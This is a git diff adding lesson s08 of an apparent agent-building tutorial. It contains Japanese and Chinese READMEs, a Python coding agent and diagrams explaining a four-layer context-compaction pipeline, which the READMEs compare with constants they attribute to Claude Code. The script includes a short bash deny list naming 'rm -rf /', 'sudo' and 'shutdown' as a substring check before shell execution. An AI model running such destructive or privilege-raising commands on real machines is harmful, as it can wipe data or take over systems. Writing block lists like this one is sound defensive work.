+``` + +**順序は変えられない。** 安価なものを先に、高価なものを後に。緊急対応はエラー発生時のみトリガー。 + +--- + +## s07 からの変更点 + +| コンポーネント | 変更前 (s07) | 変更後 (s08) | +|------|-----------|-----------| +| コンテキスト管理 | なし(コンテキストが無限に膨張) | 4 層圧縮パイプライン + 緊急対応 | +| 新規関数 | — | snip_compact, micro_compact, tool_result_budget, compact_history, reactive_compact | +| ツール | bash, read_file, write_file, edit_file, glob, todo_write, task, load_skill (8) | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | +| ループ | LLM 呼び出し → ツール実行 | 各ラウンド前に 3 層プリプロセッサを実行 + 閾値で compact_history をトリガー | +| 設計原則 | — | 安価なものを先に、高価なものを後に | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s08_context_compact/code.py +``` + +以下のプロンプトを試してみてください: + +1. `Read the file README.md, then read code.py, then read s01_agent_loop/README.md`(連続して複数のファイルを読み、L2 の古い結果圧縮を観察) +2. `Read every file in s08_context_compact/`(一度に大量の内容を読み込み、L3 のディスク退避を観察) +3. 20+ ラウンドの対話を繰り返し、`[auto compact]` または `[reactive compact]` が表示されるか観察 + +観察のポイント:ツール実行のたびに、古い tool_result は圧縮されているか?連続対話で token が閾値を超えたとき、要約が自動的にトリガーされたか? + +--- + +## 次へ + +コンテキスト圧縮により、Agent は長時間クラッシュせずに動けるようになった。しかし、圧縮のたびにユーザーが以前に伝えた偏好や制約も一緒に失われてしまう。Agent が重要なことを **選択的に記憶** できるようにできないか? + +s09 Memory → 3 つのサブシステム:何を記憶するかの選択、重要情報の抽出、整理と統合。圧縮を越え、セッションを越えて。 + +
+
## CC ソースコードの詳細

> 以下は CC ソースコード `compact.ts`(1705 行)、`autoCompact.ts`(351 行)、`microCompact.ts` の完全な分析に基づく。

### 実行順序の対応

| 項目 | 教学版 | Claude Code |
|------|--------|-------------|
| 実行順序 | snip → micro → budget → auto | 完全に同一(`query.ts:379-543`) |
| snip_compact | 先頭 3 + 末尾 47 を保持 | 同じ、CC はメインスレッドのみ有効 |
| micro_compact | テキストプレースホルダで置換 | API の `cache_edits`(prompt cache を破壊しない) |
| micro_compact ホワイトリスト | 位置による(直近 3 件) | Read/Bash/Grep/Glob/WebSearch/WebFetch/Edit/Write |
| tool_result_budget | 200KB 文字 | 200,000 文字(~50K token)、完全に同一 |
| compact_history 閾値 | 文字数で推定 | 精密な token 数:`contextWindow - maxOutputTokens - 13_000` |
| 要約の要求 | 5 種類の情報 | 9 つのセクション + `<analysis>`/`<summary>` デュアルタグ |
| 圧縮プロンプト | シンプルなプロンプト | 先頭と末尾に二重の安全ガードでツール呼び出しを禁止 |
| reactive_compact | あり(簡略版) | バイト精度のグループ単位ロールバック |
| 圧縮後のリカバリ | なし | 直近のファイルを自動再読み込み |
| サーキットブレーカー | 3 回 | 3 回(テレメトリ駆動設計) |

### 完全な定数リファレンス

| 定数 | 値 | ソースファイル |
|------|-----|--------|
| `AUTOCOMPACT_BUFFER_TOKENS` | 13,000 | `autoCompact.ts:62` |
| `MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES` | 3 | `autoCompact.ts:70` |
| `MAX_OUTPUT_TOKENS_FOR_SUMMARY` | 20,000 | `autoCompact.ts:30` |
| `POST_COMPACT_TOKEN_BUDGET` | 50,000 | `compact.ts:123` |
| `POST_COMPACT_MAX_FILES_TO_RESTORE` | 5 | `compact.ts:122` |
| `POST_COMPACT_MAX_TOKENS_PER_FILE` | 5,000 | `compact.ts:124` |
| 時間ベース micro_compact 間隔 | 60 分 | `timeBasedMCConfig.ts:32` |
| PTL リトライ回数 | 3 | `compact.ts:227` |
| ストリームリトライ回数 | 2 | `compact.ts:131` |

### contextCollapse と sessionMemoryCompact

CC ソースコードには、この教学版では展開していない 2 つのメカニズムが存在する:

- **contextCollapse**:独立したコンテキスト管理システムで、有効時には compact_history を完全に置き換える。CC の内部コンパイルモジュールに依存するため、教学版では展開しない。
- **sessionMemoryCompact**:compact_history の前に、CC は既存の session memory(s09 で解説)を使った軽量要約を先に試みる。LLM を呼び出さない。このメカニズムは s09 を学んだ後に振り返るとより理解しやすい。

### 圧縮プロンプトの中身

CC の圧縮プロンプトには 2 つの厳格な要件がある:

1. **ツール呼び出しの絶対禁止**:冒頭が `CRITICAL: Respond with TEXT ONLY. Do NOT call any tools.` で、末尾にも再度 REMINDER がある
2. 
**先に分析してから要約**:モデルはまず `` タグで思考を整理し、その後 `` タグで正式な要約を出力する。analysis はフォーマット時に除去される + +### 教学版の簡略化は意図的 + +- micro_compact でテキストプレースホルダを使用 → API 層の `cache_edits` 権限がないため +- token を文字数で推定 → 精密な tokenizer は教学の対象外 +- 2 つの補助メカニズムを展開しない → 10% の細部に属する + +**コア設計思想 — 安価なものを先に、高価なものを後に — は完全に保持されている。** + +
+ + diff --git a/s08_context_compact/README.md b/s08_context_compact/README.md new file mode 100644 index 000000000..5633aaf1f --- /dev/null +++ b/s08_context_compact/README.md @@ -0,0 +1,265 @@ +# s08: Context Compact — 上下文总会满,要有办法腾地方 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → s07 → `s08` → [s09](../s09_memory/) → s10 → ... → s19 +> *"上下文总会满, 要有办法腾地方"* — 四层压缩策略, 便宜的先跑贵的后跑。 +> +> **Harness 层**: 压缩 — 干净的记忆, 无限的会话。 + +--- + +## 问题 + +Agent 跑着跑着,不动了。 + +手里有 bash、有 read、有 write,能力是够的。但它读了一个 1000 行的文件(~4000 token),又读了 30 个文件,跑了 20 条命令。每条命令的输出、每个文件的内容,全都堆在 `messages` 列表里。 + +上下文窗口是有限的。满了之后,API 直接拒绝——`prompt_too_long`。 + +**不压缩,Agent 根本没法在大项目里干活。** + +--- + +## 解决方案 + +![Compact Overview](images/compact-overview.svg) + +s07 的循环、技能加载、子 Agent 全部保留。唯一的变动:每轮 LLM 调用前插入三层预处理器(0 API),token 仍超阈值时触发 LLM 摘要(1 API),API 报错时应急裁剪。 + +核心设计就一句话:**便宜的先跑,贵的后跑。** + +--- + +## 工作原理 + +![四层压缩管线](images/compaction-layers.svg) + +### L1: snip_compact — 裁掉无关的旧对话 + +Agent 跑了 80 轮对话,`messages` 攒了 160 条。最前面的"帮我创建 hello.py"和当前工作几乎无关了,但全占着位置。 + +消息数超过 50 条 → 保留头部 3 条(初始上下文)和尾部 47 条(当前工作),中间裁掉: + +```python +def snip_compact(messages, max_messages=50): + if len(messages) <= max_messages: + return messages + keep_head, keep_tail = 3, max_messages - 3 + snipped = len(messages) - keep_head - keep_tail + placeholder = {"role": "user", + "content": f"[snipped {snipped} messages from conversation middle]"} + return messages[:keep_head] + [placeholder] + messages[-keep_tail:] +``` + +裁掉了整条消息,但剩下的消息里 `tool_result` 内容仍在累积——第 34 条消息里可能躺着 30KB 的旧文件内容。→ L2。 + +### L2: micro_compact — 旧工具结果占位 + +![旧结果占位](images/micro-compact.svg) + +Agent 连续读了 10 个文件。第 1-7 次的完整内容还躺在上下文里,早就不需要了,但占着大量空间。 + +只保留最近 3 条 `tool_result` 的完整内容,更旧的替换为一行占位符: + +```python +KEEP_RECENT_TOOL_RESULTS = 3 + +def micro_compact(messages): + tool_results = collect_tool_result_blocks(messages) + if len(tool_results) <= KEEP_RECENT_TOOL_RESULTS: + return messages + for _, _, block in 
tool_results[:-KEEP_RECENT_TOOL_RESULTS]:
        if len(block.get("content", "")) > 120:
            block["content"] = "[Earlier tool result compacted. Re-run if needed.]"
    return messages
```

旧结果清掉了,但单条新结果可能就有 500KB——一个 `cat` 大文件的输出就能打满上下文。→ L3。

### L3: tool_result_budget — 大结果落盘

![大结果落盘](images/layer1-budget.svg)

模型一次读了 5 个大文件,单条 user 消息里所有 `tool_result` 加起来 500KB。

统计最后一条 user 消息里所有 `tool_result` 的总大小。超过 200KB → 按大小排序,从最大的开始落盘到 `.task_outputs/tool-results/`,上下文里只留落盘标记 + 前 2000 字符预览。模型看到标记后知道完整内容在磁盘上,需要时可以重新读。

```python
def tool_result_budget(messages, max_bytes=200_000):
    last = messages[-1]
    blocks = [(i, b) for i, b in enumerate(last["content"])
              if b.get("type") == "tool_result"]
    total = sum(len(str(b.get("content", ""))) for _, b in blocks)
    if total <= max_bytes:
        return messages
    ranked = sorted(blocks, key=lambda p: len(str(p[1].get("content", ""))), reverse=True)
    for idx, block in ranked:
        if total <= max_bytes:
            break
        block["content"] = persist_large_output(block["tool_use_id"], str(block["content"]))
        total = recalculate_total(blocks)
    return messages
```

前三层都是纯文本/结构操作——0 API 调用,但也无法"理解"对话内容。上下文可能仍然太大。→ L4。

### L4: compact_history — LLM 全量摘要

![LLM 全量摘要](images/auto-compact.svg)

前三层全跑完了,但在超大项目中连续工作 30 分钟后,token 仍然超过阈值。

三步流程:

1. **保存 transcript**:完整对话写入 `.transcripts/`,JSONL 格式。信息没有丢失,只是移出了活跃上下文。
2. **LLM 生成摘要**:把对话历史发给 LLM,要求保留当前目标、重要发现、已改文件、剩余工作、用户约束等关键信息。
3. 
**替换消息列表**:所有旧消息被替换为一条摘要。摘要后自动重新附加最近几个文件的内容,确保模型不会丢失当前文件上下文。 + +```python +def compact_history(messages, state): + transcript_path = write_transcript(messages) # 先保存完整对话 + summary = summarize_history(messages) # LLM 生成摘要 + state.has_compacted = True + return [{"role": "user", + "content": f"[Compacted]\n\n{summary}"}] +``` + +**熔断器**:连续失败 3 次后停止重试,防止死循环浪费 API 调用。 + +### 应急: reactive_compact + +有时候 API 还是返回 `prompt_too_long`(413)——上下文增长速度快于压缩触发速度时。 + +这时触发 **reactive_compact**:比 compact_history 更激进,从尾部回退,以字节级精度裁剪到 API 可接受的大小,只保留最后 5 条消息 + 摘要。 + +```python +def reactive_compact(messages): + transcript = write_transcript(messages) + summary = summarize_history(messages) + tail = messages[-5:] + return [{"role": "user", + "content": f"[Reactive compact]\n\n{summary}"}, *tail] +``` + +### 合起来跑 + +```python +def agent_loop(messages, state): + while True: + # 三个预处理器(0 API 调用) + messages[:] = snip_compact(messages) # 裁中间 + messages[:] = micro_compact(messages) # 旧结果占位 + messages[:] = tool_result_budget(messages) # 大结果落盘 + + # 还不够?LLM 摘要(1 API 调用) + if estimate_token_count(messages) > THRESHOLD: + messages[:] = compact_history(messages, state) + + try: + response = client.messages.create(...) + except PromptTooLongError: + messages[:] = reactive_compact(messages) # 应急 + continue + # ... 工具执行 ... +``` + +**顺序不能换。** 便宜的先跑,贵的后跑。应急只在报错时才触发。 + +--- + +## 相对 s07 的变更 + +| 组件 | 之前 (s07) | 之后 (s08) | +|------|-----------|-----------| +| 上下文管理 | 无(上下文无限膨胀) | 四层压缩管线 + 应急 | +| 新函数 | — | snip_compact, micro_compact, tool_result_budget, compact_history, reactive_compact | +| 工具 | bash, read_file, write_file, edit_file, glob, todo_write, task, load_skill (8) | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | +| 循环 | LLM 调用 → 工具执行 | 每轮前跑三层预处理器 + 阈值触发 compact_history | +| 设计原则 | — | 便宜的先跑,贵的后跑 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s08_context_compact/code.py +``` + +试试这些 prompt: + +1. 
`Read the file README.md, then read code.py, then read s01_agent_loop/README.md`(连续读多个文件,观察 L2 压缩旧结果) +2. `Read every file in s08_context_compact/`(一次性读大量内容,观察 L3 落盘) +3. 反复对话 20+ 轮,观察是否出现 `[auto compact]` 或 `[reactive compact]` + +观察重点:每次工具执行后,旧 tool_result 是否被压缩?连续对话后 token 超阈值时,是否自动触发了摘要? + +--- + +## 接下来 + +上下文压缩让 Agent 能跑很久不会崩。但每次压缩后,用户之前告诉它的偏好、约束也跟着丢了。能不能让 Agent **有选择地记住**重要的事? + +s09 Memory → 三个子系统:选择记什么、提取关键信息、整理巩固。跨压缩、跨会话。 + +
+
## 深入 CC 源码

> 以下基于 CC 源码 `compact.ts`(1705 行)、`autoCompact.ts`(351 行)、`microCompact.ts` 的完整分析。

### 执行顺序对照

| 维度 | 教学版 | Claude Code |
|------|--------|-------------|
| 执行顺序 | snip → micro → budget → auto | 完全一致(`query.ts:379-543`) |
| snip_compact | 保留头 3 + 尾 47 | 同,CC 仅主线程启用 |
| micro_compact | 文本占位符替换 | API `cache_edits`(不破坏 prompt cache) |
| micro_compact 白名单 | 按位置(最近 3 条) | Read/Bash/Grep/Glob/WebSearch/WebFetch/Edit/Write |
| tool_result_budget | 200KB 字符 | 200,000 字符(~50K token),完全一致 |
| compact_history 阈值 | 字符数估算 | 精确 token:`contextWindow - maxOutputTokens - 13_000` |
| 摘要要求 | 5 类信息 | 9 个部分 + `<analysis>`/`<summary>` 双标签 |
| 压缩 prompt | 简单 prompt | 首尾双重防呆禁止调工具 |
| reactive_compact | 有(简化) | 字节级精度回退群组 |
| 后压缩恢复 | 无 | 自动重新读取最近文件 |
| 熔断器 | 3 次 | 3 次(遥测驱动设计) |

### 完整常量参考

| 常量 | 值 | 源文件 |
|------|-----|--------|
| `AUTOCOMPACT_BUFFER_TOKENS` | 13,000 | `autoCompact.ts:62` |
| `MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES` | 3 | `autoCompact.ts:70` |
| `MAX_OUTPUT_TOKENS_FOR_SUMMARY` | 20,000 | `autoCompact.ts:30` |
| `POST_COMPACT_TOKEN_BUDGET` | 50,000 | `compact.ts:123` |
| `POST_COMPACT_MAX_FILES_TO_RESTORE` | 5 | `compact.ts:122` |
| `POST_COMPACT_MAX_TOKENS_PER_FILE` | 5,000 | `compact.ts:124` |
| 时间 micro_compact 间隔 | 60 分钟 | `timeBasedMCConfig.ts:32` |
| PTL 重试次数 | 3 | `compact.ts:227` |
| 流重试次数 | 2 | `compact.ts:131` |

### contextCollapse 和 sessionMemoryCompact

CC 源码中还有两个机制本教学版没有展开:

- **contextCollapse**:一个独立的上下文管理系统,启用时会完全替代 compact_history。它依赖 CC 的内部编译模块,教学版不展开。
- **sessionMemoryCompact**:compact_history 之前,CC 会先尝试用已有的 session memory(s09 会讲到)做轻量摘要,不调 LLM。这个机制等学完 s09 之后回头看会更清楚。

### 压缩 prompt 长什么样?

CC 的压缩 prompt 有两个硬性要求:

1. **绝对禁止调用工具**:开头就是 `CRITICAL: Respond with TEXT ONLY. Do NOT call any tools.`,末尾还会再 REMINDER 一次
2. 
**先分析再总结**:模型需要先在 `` 标签里理清思路,然后在 `` 标签里输出正式摘要。analysis 在格式化时被剥离 + +### 教学版的简化是刻意的 + +- micro_compact 用文本占位 → 我们没有 API 层的 `cache_edits` 权限 +- token 用字符数估算 → 精确 tokenizer 不在教学范围内 +- 两个辅助机制不展开 → 属于 10% 的细节 + +**核心设计思想——便宜的先跑,贵的后跑——完整保留。** + +
+ + diff --git a/s08_context_compact/code.py b/s08_context_compact/code.py new file mode 100644 index 000000000..c04ee0e4a --- /dev/null +++ b/s08_context_compact/code.py @@ -0,0 +1,308 @@ +#!/usr/bin/env python3 +""" +s08_context_compact.py - Context Compact + +Four-layer compaction pipeline inserted before LLM calls: + + L1: snip_compact — trim middle messages when count > 50 + L2: micro_compact — replace old tool_results with placeholders + L3: tool_result_budget — persist large results to disk + L4: compact_history — LLM full summary (1 API call) + + Emergency: reactive_compact — when API still returns prompt_too_long + + ┌─────────────────────────────────────────────────────────────┐ + │ messages[] │ + │ ↓ │ + │ L1 snip ─→ L2 micro ─→ L3 budget ─→ [token > threshold?] │ + │ ├─ No → LLM │ + │ └─ Yes → L4 summary │ + │ ↓ │ + │ LLM call │ + │ [prompt_too_long?] │ + │ └─ Yes → reactive │ + └─────────────────────────────────────────────────────────────┘ + +Core principle: cheap first, expensive last. + +Builds on s07 (skill loading). Usage: + + python s08_context_compact/code.py + Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess, json, time +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +SKILLS_DIR = WORKDIR / "skills" +TRANSCRIPT_DIR = WORKDIR / ".transcripts" +TOOL_RESULTS_DIR = WORKDIR / ".task_outputs" / "tool-results" +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. Keep working step by step, and use compact if the conversation gets too long." 
+ +# ═══════════════════════════════════════════════════════════ +# FROM s02-s07 (unchanged): Basic Tools +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(cmd: str) -> str: + try: + r = subprocess.run(cmd, shell=True, cwd=WORKDIR, capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path); file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content); return f"Wrote {len(content)} bytes to {path}" + except Exception as e: return f"Error: {e}" + +def extract_text(content) -> str: + if not isinstance(content, list): return str(content) + return "\n".join(getattr(b, "text", "") for b in content if getattr(b, "type", None) == "text") + +def spawn_subagent(task: str) -> str: + sub_tools = [{"name": "bash", "description": "Run a shell command.", "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", "input_schema": {"type": "object", "properties": {"path": {"type": "string"}}, "required": ["path"]}}] + sub_handlers = {"bash": run_bash, "read_file": run_read} + messages = [{"role": "user", "content": task}] + while True: + response = client.messages.create(model=MODEL, system=SYSTEM, messages=messages, tools=sub_tools, 
max_tokens=8000) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": break + results = [] + for block in response.content: + if block.type == "tool_use": + h = sub_handlers.get(block.name) + output = h(**block.input) if h else f"Unknown: {block.name}" + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + return extract_text(messages[-1]["content"]) + +def list_skills() -> str: + if not SKILLS_DIR.exists(): return "(no skills)" + skills = [] + for d in sorted(SKILLS_DIR.iterdir()): + if d.is_dir() and (d / "SKILL.md").exists(): + skills.append(f"- **{d.name}**: {(d/'SKILL.md').read_text().split(chr(10))[0].lstrip('#').strip()}") + return "\n".join(skills) if skills else "(no skills)" + +def load_skill(name: str) -> str: + m = SKILLS_DIR / name / "SKILL.md" + return m.read_text() if m.exists() else f"Skill not found: {name}" + + +# ═══════════════════════════════════════════════════════════ +# NEW in s08: Four-Layer Compaction Pipeline +# ═══════════════════════════════════════════════════════════ + +CONTEXT_LIMIT = 50000 +KEEP_RECENT = 3 +PERSIST_THRESHOLD = 30000 + +def estimate_size(msgs): return len(str(msgs)) + + +# L1: snipCompact — trim middle messages +def snip_compact(messages, max_messages=50): + if len(messages) <= max_messages: return messages + keep_head, keep_tail = 3, max_messages - 3 + snipped = len(messages) - keep_head - keep_tail + return messages[:keep_head] + [{"role": "user", "content": f"[snipped {snipped} messages]"}] + messages[-keep_tail:] + + +# L2: microCompact — old result placeholders +def collect_tool_results(messages): + blocks = [] + for mi, msg in enumerate(messages): + if msg.get("role") != "user" or not isinstance(msg.get("content"), list): continue + for bi, block in enumerate(msg["content"]): + if isinstance(block, dict) and block.get("type") == "tool_result": + blocks.append((mi, 
bi, block))
    return blocks

def micro_compact(messages):
    tool_results = collect_tool_results(messages)
    if len(tool_results) <= KEEP_RECENT: return messages
    for _, _, block in tool_results[:-KEEP_RECENT]:
        if len(block.get("content", "")) > 120:
            block["content"] = "[Earlier tool result compacted. Re-run if needed.]"
    return messages


# L3: toolResultBudget — persist large results to disk
def persist_large_output(tool_use_id, output):
    if len(output) <= PERSIST_THRESHOLD: return output
    TOOL_RESULTS_DIR.mkdir(parents=True, exist_ok=True)
    path = TOOL_RESULTS_DIR / f"{tool_use_id}.txt"
    if not path.exists(): path.write_text(output)
    return f"[tool result persisted to disk]\nFull output: {path}\nPreview:\n{output[:2000]}"

def tool_result_budget(messages, max_bytes=200_000):
    last = messages[-1] if messages else None
    if not last or last.get("role") != "user" or not isinstance(last.get("content"), list): return messages
    blocks = [(i, b) for i, b in enumerate(last["content"]) if isinstance(b, dict) and b.get("type") == "tool_result"]
    total = sum(len(str(b.get("content", ""))) for _, b in blocks)
    if total <= max_bytes: return messages
    ranked = sorted(blocks, key=lambda p: len(str(p[1].get("content", ""))), reverse=True)
    for _, block in ranked:
        if total <= max_bytes: break
        content = str(block.get("content", ""))
        if len(content) <= PERSIST_THRESHOLD: continue
        tid = block.get("tool_use_id", "unknown")
        block["content"] = persist_large_output(tid, content)
        total = sum(len(str(b.get("content", ""))) for _, b in blocks)
    return messages


# L4: autoCompact — LLM full summary
def write_transcript(messages):
    TRANSCRIPT_DIR.mkdir(parents=True, exist_ok=True)
    path = TRANSCRIPT_DIR / f"transcript_{int(time.time())}.jsonl"
    with path.open("w") as f:
        for msg in messages: f.write(json.dumps(msg, default=str) + "\n")
    return path

def summarize_history(messages):
    conversation = json.dumps(messages, default=str)[:80000]
    prompt = ("Summarize this 
coding-agent conversation so work can continue.\n" + "Preserve: 1. current goal, 2. key findings/decisions, 3. files read/changed, " + "4. remaining work, 5. user constraints.\nBe compact but concrete.\n\n" + conversation) + response = client.messages.create(model=MODEL, messages=[{"role": "user", "content": prompt}], max_tokens=2000) + return response.content[0].text.strip() + +def compact_history(messages): + transcript_path = write_transcript(messages) + print(f"[transcript saved: {transcript_path}]") + summary = summarize_history(messages) + return [{"role": "user", "content": f"[Compacted]\n\n{summary}"}] + + +# Emergency: reactiveCompact — on API error +def reactive_compact(messages): + transcript = write_transcript(messages) + summary = summarize_history(messages) + return [{"role": "user", "content": f"[Reactive compact]\n\n{summary}"}, *messages[-5:]] + + +# ═══════════════════════════════════════════════════════════ +# FROM s07 (unchanged): Tool Definitions +# ═══════════════════════════════════════════════════════════ + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "task", "description": "Launch a subagent.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}}, + {"name": "list_skills", "description": "List available skills.", "input_schema": {"type": "object", "properties": {}}}, + {"name": "load_skill", "description": "Load skill by name.", 
+ "input_schema": {"type": "object", "properties": {"name": {"type": "string"}}, "required": ["name"]}}, + # s08 change: new compact tool + {"name": "compact", "description": "Summarize earlier conversation to free context space.", + "input_schema": {"type": "object", "properties": {"focus": {"type": "string"}}}}, +] + +TOOL_HANDLERS = {"bash": run_bash, "read_file": run_read, "write_file": run_write, "task": spawn_subagent, + "list_skills": list_skills, "load_skill": load_skill, "compact": lambda **kw: "Compacting..."} + +# FROM s04 (unchanged): Hooks +HOOKS = {"PreToolUse": []} +def trigger_hooks(event, *args): + for cb in HOOKS[event]: + r = cb(*args) + if r is not None: return r + return None +DENY_LIST = ["rm -rf /", "sudo", "shutdown"] +def permission_hook(block): + if block.name == "bash": + for p in DENY_LIST: + if p in block.input.get("command", ""): return "Permission denied" + return None +HOOKS["PreToolUse"].append(permission_hook) + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — s08 core: run compaction pipeline before LLM +# ═══════════════════════════════════════════════════════════ + +def agent_loop(messages: list): + while True: + # s08 change: three preprocessors (0 API calls, cheap first) + messages[:] = snip_compact(messages) + messages[:] = micro_compact(messages) + messages[:] = tool_result_budget(messages) + + # s08 change: tokens still over threshold → LLM summary (1 API call) + if estimate_size(messages) > CONTEXT_LIMIT: + print("[auto compact]") + messages[:] = compact_history(messages) + + try: + response = client.messages.create(model=MODEL, system=SYSTEM, messages=messages, tools=TOOLS, max_tokens=8000) + except Exception as e: + if "prompt_too_long" in str(e).lower() or "too many tokens" in str(e).lower(): + print("[reactive compact]") + messages[:] = reactive_compact(messages) + continue + raise + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != 
"tool_use": return + + results = [] + for block in response.content: + if block.type != "tool_use": continue + print(f"\033[36m> {block.name}\033[0m") + blocked = trigger_hooks("PreToolUse", block) + if blocked: results.append({"type": "tool_result", "tool_use_id": block.id, "content": str(blocked)}); continue + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, "content": str(output)}) + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s08: Context Compact") + print("输入问题,回车发送。输入 q 退出。\n") + history = [] + while True: + try: query = input("\033[36ms08 >> \033[0m") + except (EOFError, KeyboardInterrupt): break + if query.strip().lower() in ("q", "exit", ""): break + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": print(block.text) + print() diff --git a/s08_context_compact/images/auto-compact.en.svg b/s08_context_compact/images/auto-compact.en.svg new file mode 100644 index 000000000..7577ac8bd --- /dev/null +++ b/s08_context_compact/images/auto-compact.en.svg @@ -0,0 +1,72 @@ + + + + + + + + + + + + + + L4: autoCompact — LLM Full Summary + + + + Trigger Condition + All three preprocessing layers have run, estimated tokens > contextWindow - maxOutputTokens - 13_000. + Tries sessionMemoryCompact first (lightweight summary from existing memory), only calls LLM if insufficient. 
+ + + + Step 1: Save transcript + Write full conversation to .transcripts/ + JSONL format, one message per line + Filename: transcript_{timestamp}.jsonl + No data lost, just moved out of active area + + + + + Step 2: LLM generates summary + Send conversation history to LLM + Summary must include 9 sections: + request · concepts · files · errors · resolutions + user messages · todos · current state · next steps + Generated only once + + + + + Step 3: Replace message list + All old messages → 1 summary + Model continues from summary + Includes recently_read file list + ⚠ This is an irreversible operation + + + + Before messages + user + assistant + user + assistant + user + ~180 messages, occupying 62K tokens + + + + + After messages + + [Compacted] Summary: goal → create hello.py ... + Recent files: hello.py, README.md ... + ~1 message, occupying 1K tokens + + + + Circuit breaker: + 3 consecutive autocompact failures → stop retrying. Prevents wasting API calls when context is unrecoverable. + diff --git a/s08_context_compact/images/auto-compact.ja.svg b/s08_context_compact/images/auto-compact.ja.svg new file mode 100644 index 000000000..2488bd079 --- /dev/null +++ b/s08_context_compact/images/auto-compact.ja.svg @@ -0,0 +1,72 @@ + + + + + + + + + + + + + + L4: autoCompact — LLM 完全要約 + + + + トリガー条件 + 前 3 層の前処理を全て実行後、推定 token > contextWindow - maxOutputTokens - 13_000。 + まず sessionMemoryCompact を試行(既存のメモリで軽量要約)、不足時のみ LLM を呼び出し。 + + + + ステップ 1:transcript 保存 + 完全な対話を .transcripts/ に書き込み + JSONL 形式、1 行 1 メッセージ + ファイル名:transcript_{timestamp}.jsonl + 情報は失われていない、アクティブ領域から移動のみ + + + + + ステップ 2:LLM 要約生成 + 対話履歴を LLM に送信 + 要約は 9 つのセクションを含む: + リクエスト・概念・ファイル・エラー・解決 + ユーザーメッセージ・TODO・現在・次ステップ + 1 回のみ生成 + + + + + ステップ 3:メッセージリスト置換 + 全旧メッセージ → 1 件の要約に + モデルは要約から作業を継続 + recently_read ファイルリストを付与 + ⚠ これは復元不可能な操作 + + + + 圧縮前 messages + user + assistant + user + assistant + user + ~180 件のメッセージ、62K トークンを占有 + + + + + 圧縮後 messages + + [Compacted] 要約:目標 → hello.py を作成 ... 
+ 最近のファイル:hello.py, README.md ... + ~1 件のメッセージ、1K トークンを占有 + + + + サーキットブレーカー: + autocompact が連続 3 回失敗 → リトライ停止。コンテキストが復元不可能な場合の API 呼び出しの無駄な反復を防止。 + diff --git a/s08_context_compact/images/auto-compact.svg b/s08_context_compact/images/auto-compact.svg new file mode 100644 index 000000000..c7691f956 --- /dev/null +++ b/s08_context_compact/images/auto-compact.svg @@ -0,0 +1,72 @@ + + + + + + + + + + + + + + L4: autoCompact — LLM 全量摘要 + + + + 触发条件 + 前三层预处理全跑完,估算 token > contextWindow - maxOutputTokens - 13_000。 + 先尝试 sessionMemoryCompact(用已有记忆做轻量摘要),不足才调 LLM。 + + + + 步骤 1:保存 transcript + 完整对话写入 .transcripts/ + JSONL 格式,一行一条消息 + 文件名:transcript_{timestamp}.jsonl + 信息没有丢失,只是移出活跃区 + + + + + 步骤 2:LLM 生成摘要 + 把对话历史发给 LLM + 摘要需包含 9 个部分: + 请求·概念·文件·错误·解决 + 用户消息·待办·当前·下一步 + 只生成一次 + + + + + 步骤 3:替换消息列表 + 所有旧消息 → 1 条摘要 + 模型从摘要继续工作 + 附带 recently_read 文件列表 + ⚠ 这是无法恢复的操作 + + + + 压缩前 messages + user + assistant + user + assistant + user + ~180 条消息,占 62K token + + + + + 压缩后 messages + + [Compacted] 摘要:目标 → 创建 hello.py ... + 最近文件:hello.py, README.md ... + ~1 条消息,占 1K token + + + + 熔断器: + 连续 autocompact 失败 3 次 → 停止重试。防止上下文不可恢复时反复浪费 API 调用。 + diff --git a/s08_context_compact/images/compact-overview.en.svg b/s08_context_compact/images/compact-overview.en.svg new file mode 100644 index 